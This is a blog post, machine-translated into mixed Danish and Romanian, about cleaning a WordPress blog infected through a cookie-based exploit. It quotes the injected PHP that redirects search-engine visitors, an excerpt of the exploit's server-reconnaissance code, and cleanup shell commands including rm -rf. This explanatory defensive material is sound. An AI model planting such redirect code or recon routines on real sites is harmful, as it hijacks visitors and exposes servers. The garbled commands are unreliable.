I den sidste måned blev jeg ved med at få advarsler fra virus på bloggen fra nogle besøgende. Til at begynde med ignorerede jeg advarslerne, fordi jeg havde et ret godt antivirus installeret (Kaspersky AV 2009) og selvom jeg brugte lang tid på bloggen, modtog jeg aldrig virusadvarslen (.. for et stykke tid siden så jeg noget mistænkeligt, som forsvandt ved første opdatering. endelig...).
Langsomt, langsomt begyndte store variationer at dukke op besøgende trafik, hvorefter trafikken på det seneste er faldet konstant, og der er begyndt at være flere og flere, der fortæller mig det stealthsettings.com Det er det virusat. I går modtog jeg fra en person et skærmbillede taget, da antivirusset blokerede en manuskript fra stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Det var overbevisende nok for mig, at jeg begyndte at lede efter det i alle kilderne. Den første idé, der kom til mig, var at gøre det opgradering til den seneste version af WordPress (2.5.1), men ikke før sletning af alle de gamle WordPress-scriptfiler og gør database backup. Denne procedure gav ingen resultater, og det ville sandsynligvis have taget mig lang tid at finde ud af, hvor fejlen var, hvis han ikke havde fortalt mig Eugen i en diskussion over kaffe, som han fandt et link på Google, og det ville være godt at se det.
MyDigitalLife.info, udgav en artikel med titlen: "WordPress Hack: Gendan og ret Google og søgemaskine eller ingen cookietrafik omdirigeret til Your-Needs.info, AnyResults.Net, Golden-Info.net og andre ulovlige websteder”, som er slutningen på den tråd, jeg havde brug for.
Det handler om en udnyttelse af WordPress baseret på cookies, som efter min mening er meget kompleks og lavet i henhold til bogen. Smart nok til at lave en SQL-injektion i blogdatabasen, at skabe en usynlig bruger til et simpelt rutinetjek fra Dashboard->Brugere, for at kontrollere de "skrivbare" mapper og filer på serveren (som har chmod 777), for at søge og til udføre filer med gruppe- eller endda root-privilegier. Jeg kender ikke navnet på udnyttelsen, og jeg kan se, at der er skrevet få artikler om det, på trods af at der er mange inficerede blogs, også fra Rumænien. Ok... Jeg vil prøve at forklare generelle forhold om denne virus.
Hvad gør virussen?
Først og fremmest indsætter det i kilderne til sider på blogs, usynlige links for besøgende, men synlige og indekserbare for søgemaskiner, især Google. På denne måde overfør Page Rank til websteder angivet af angriberen. For det andet indsættes en mere omdirigeringskode URL, for besøgende, der kommer fra Google, Live, Yahoo, ... eller fra en RSS-læser og ikke har webstedet i cookie. Og Antivirus registrerer denne omdirigering som Trojan-Clicker.HTML.
Symptomer:
Det massive fald i besøgstrafikken, især på blogs, hvor de fleste besøgende kommer fra Google.
Identificere: (det er her problemet bliver kompliceret for dem, der ikke ved meget om phpmyadmin, php og linux)
DE. OMHYGGELIG!!! LAVE FØRST EN DATABASE-BACKUP!!!
1. Tjek filkilderne Index.php, header.php, sidefod.php, fra blog-emnet og se, om der er en kode, der bruger kryptering base64 eller indeholder "if($ser=="1? && sizeof($_COOKIE)==0)" i formen:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>...eller noget lignende. Slet denne kode!
Klik for at forestille dig...
I skærmbilledet ovenfor valgte jeg fejlagtigt "<?php get_header(); ?>Den kode skal forblive.
2. Brug phpmyadmin og gå til tabellen i databasen WP_USERS, hvor du tjekker om der er en bruger uden navn, oprettet den 00:00:00 0000-00-00 (det er muligt i marken user_login skriv "WordPress". Skriv denne brugers ID (ID-felt) ned og slet det.
Klik for at forestille dig...
*den på den grønne linje, dens ID skal slettes og beholdes. I hans tilfælde søvnig, var ID=8 .
3. Gå til bordet WP_Usermeta, hvor du skal placeret du er Slet linjerne relateret til ID'et (hvor i feltet bruger_id værdien af det slettede ID vises).
4. I tabellen wp_option, gå ind Active_plugins og se hvilket plugin der mistænkeligt er aktiveret. Den kan bruge slutninger som _old.giff, _old.pngg, _old.jpeg, _new.php.giffosv. kombinationer af falske billedudvidelser med _gamle og _nye.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Slet dette plugin, og gå derefter til bloggen –> Dashboard -> Plugins, hvor du deaktiverer og aktiverer et bestemt plugin.
Klik på billedet for at se, hvordan den inficerede fil vises i active_plugins.
Følg FTP- eller SSH-stien angivet i active_plugins, og slet filen fra serveren.
5. Også i phpMyAdmin, i tabellen wp_option, find og slet linjen, der indeholder "RIS_F541B3ABD05E7962FCAB37737F40FAD8"og vend"intern_links_cache".
I internal_links_cache, spam-links, der vises i bloggen og en Google Adsense kode, af hackeren.
6. Det anbefales, at du ændre adgangskode af at logge på bloggen og så fjerne alle mistænkelige brugere. Opgrader til den nyeste version af WordPress og indstil bloggen til ikke længere at tillade registrering af nye brugere. Der er intet tab... selv ikke-loggede kan kommentere.
Jeg forsøgte at forklare ovenfor, hvor meget, hvad man skal gøre i en sådan situation, for at rense bloggen for denne virus. Problemet er meget mere alvorligt, end det ser ud til, og ikke langt fra at være løst, fordi de er brugt sikkerhedssårbarheder af den hosting-webserver, som bloggen er på.
Som en første sikkerhedsforanstaltning, hvem har adgang Ssh, sa faca cateva verificari pe server pentru a vedea daca mai exista fisiere de genul *_old* si *_new.* cu terminatiile .giff, .jpeg, .pngg, .jpgg. Aceste fisiere trebuiesc sterse. Daca redenumim un fisier, de ex. top_right_old.giff i top_right_old.php, vedem ca in fisier este exact codul de exploit server.
Cateva indicatii utile de verificare, curatare si securizare server. (via SSH)
1. cd /tmp si verificati daca exista foldere de genul tmpVFlma sau alte combinatii de nume asemenatoare si stergeti-l. Vedeti in screenshotul de mai jos, doua astfel de foldere la mine:
rm –rf numefolder
2. Verificati si elimiati (schimbati chmod-ul) pe cat posibil folderele cu atribute chmod 777
find all writable files in current dir: find . -type f -perm -2 -ls
find alle skrivbare mapper i den aktuelle mappe: finde. -type d -perm -2 -ls
find alle skrivbare mapper og filer i den aktuelle mappe: Find. -perm -2 –LS
3. Se efter mistænkelige filer på serveren.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, OMHYGGELIG!!! til de filer, der sætter bit SYD og Skøjte. Disse filer eksekveres med brugerens (gruppen) eller roots privilegier, ikke med rettighederne for den bruger, der udfører filen. Disse filer kan føre til rodkompromittering, hvis der er sikkerhedsproblemer. Hvis du ikke bruger filer med SUID- og SGID-bit, skal du køre "chmod 0" på dem eller afinstaller pakken, der indeholder dem.
Udnyttelsen indeholder et sted i kilden...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}... praktisk talt på denne måde finder han sikkerhedsbrud. Åbne porte, "skrivbare" mapper og filudførelse med gruppe-/rodrettigheder.
Jeg vender tilbage med detaljer...
Cateva bloguri infectate: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
motociclete.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
… si lista poate continua … foarte mult.
Puteti verifica daca un blog este virusat, folosind motorul de cautare Google. copy & paste :
site:www.blegoo.com buy
Nopate buna si spor la treaba ;) In curand cred ca va veni cu noutati Eugen, pe prevezibil.imprevizibil.com.
brb :)
LA: ATENTIE! Schimbarea temei de WordPress sau upgrade-ul la WordPress 2.5.1, NU reprezinta o solutie pentru a scapa de acest virus.
